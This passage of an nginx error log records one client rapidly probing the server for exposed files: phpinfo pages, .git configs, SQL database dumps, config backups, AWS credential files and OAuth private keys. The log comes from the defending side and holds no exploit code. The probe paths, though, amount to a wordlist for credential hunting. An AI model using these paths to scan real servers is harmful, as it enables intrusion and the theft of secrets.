web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo-preprod HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.stg HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo-server HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo-server.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo.srv HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo-api HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfoapi HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo_details.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfo_details HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfomolten.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /phpinfodev HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:13 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /shop/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /bitrix/admin/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mambo/administrator/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /lib/zend/tool/framework/system/provider/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/plugins/phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /blog/wp-content/themes/.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/themes/.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/plugins/.git/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/db.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/mysql.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/dump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/uploads/db.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/uploads/mysql.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/backup/db.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/backups/db.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/db_backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/uploads/db_backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/backup/db_backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/fullbackup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/fullwebsite.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/data.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/backup/data.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/uploads/data.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/backups/data.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/backup/database.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/backups/database.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/wordpress.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/backups/wordpress.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/dbdump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/uploads/dbdump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/backups/dbdump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-content/backup/dbdump.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config-sample.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.php.bak1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wp-config.bak1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.inc.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:14 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /connect.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /connection.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /conn.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /conn.asp.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /connection.asp.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.jsp.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.ini.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/config.inc.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/config_ucenter.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/config_global.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /bitrix/php_interface/dbconn.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /uc_server/data/config.inc.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /data/config.inc.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /var/debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /content/debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /npm-debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /yarn-debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /firebase-debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.txt.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.sql.tar.gz HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.sql.zip HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mysql_debug.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /root/.aws/credentials HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.aws/secret_access_key.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.aws/s3/config.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.aws/config.yaml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.aws/secrets/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /.aws/secretsmanager/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.php.old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.inc.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.json.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.js.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/settings.local.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:15 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.local HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.local.php_old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.inc HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config.properties HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /appsettings.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /connectionstrings.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /settings.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /settings.php.old HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /settings.php.save HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/config/parameters.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /composer.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /package.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug.xml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /debug-output.txt HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /php.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /build.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /scripts/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tmp/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /symfony/_profiler/phpinfo HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /webdav/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /php-information HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tools/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /start.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /run.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /build.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /startup.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /cron.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /aws-credentials.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /configure.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /service.pwd HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /service.grp HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server.sh HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /configuration.php.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app/etc/local.xml.bak HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /database.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /mysql.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /backup.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:16 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /site.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /wordpress.sql HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server-status/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /server-info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /app_dev.php/_profiler/open?file=app/config/parameters.yml HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /storage/oauth-private.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /storage/oauth-public.key HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /storage/logs/stack.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /storage/debug.log HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /bootstrap/app.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/auth.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/filesystems.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/queue.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/session.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /config/view.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:17 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 